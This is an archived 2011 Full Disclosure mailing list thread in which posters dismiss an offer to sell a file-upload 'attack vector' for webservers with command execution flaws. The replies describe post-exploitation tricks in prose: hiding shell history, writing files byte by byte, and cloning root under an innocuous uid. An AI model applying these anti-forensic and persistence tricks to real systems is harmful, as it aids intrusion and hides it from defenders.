Full Disclosure mailing list archives
Re: New attack vector for sale, firewall bypass
From: ichib0d crane <themadichib0d () gmail com>
Date: Tue, 7 Jun 2011 14:10:20 -0700
Yeah, it's a bit like using screen to avoid 're-downloading' something you find over a remote shell, using a different shell than bash as part of an exploit so the history file is unset/obscure from the get-go, adding specific root permissions to a specific user to clone root under a 'legit' uid like 1003, ect. Just all situational tricks simple enough to not bother with a whitepaper. On Tue, Jun 7, 2011 at 1:25 PM, Dan Rosenberg <dan.j.rosenberg () gmail com> wrote:
On Tue, Jun 7, 2011 at 4:12 PM, Marshall Whittaker <marshallwhittaker () gmail com> wrote:Dan, did you come up with that on the spot or is there already a whitepaper on it?I haven't seen any whitepapers on this. I think it's the sort of thing that people just figure out when needed, or pull from their bag of tricks. -DanAnyway now that the cats out of the bag... See attached. :) No more bids please. Dan was correct. On Tue, Jun 7, 2011 at 9:38 AM, Dan Rosenberg <dan.j.rosenberg () gmail com> wrote:On Tue, Jun 7, 2011 at 6:19 AM, Marshall Whittaker <marshallwhittaker () gmail com> wrote:Hello, I am willing to sell a new attack vector I have devised. The proof of concept code you will receive has the ability to arbitrarily upload files to a webserver (tested on Apache), running linux with the well known perl read pipe vulnerability in many web CGI applications. This issue can also be leveraged through PHP LFI and RFI attacks, and through almost any other remote command execution vulnerability.If you have a remote command execution vulnerability, couldn't you just leverage whatever useful binaries are available on the victim machine (perl, python, echo) to simply copy your exploit/file/etc. to disk by printing it byte-by-byte, possibly in pieces? Did I ruin the surprise? -Dan_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- New attack vector for sale, firewall bypass Marshall Whittaker (Jun 07)
- Re: New attack vector for sale, firewall bypass Benji (Jun 07)
- Re: New attack vector for sale, firewall bypass Philipp Hagemeister (Jun 07)
- Re: New attack vector for sale, firewall bypass Dan Rosenberg (Jun 07)
- Re: New attack vector for sale, firewall bypass Marshall Whittaker (Jun 07)
- Re: New attack vector for sale, firewall bypass Dan Rosenberg (Jun 07)
- Re: New attack vector for sale, firewall bypass ichib0d crane (Jun 07)
- Message not available
- Re: New attack vector for sale, firewall bypass ascii (Jun 07)
- Re: New attack vector for sale, firewall bypass Nick FitzGerald (Jun 07)
- Re: New attack vector for sale, firewall bypass Marshall Whittaker (Jun 07)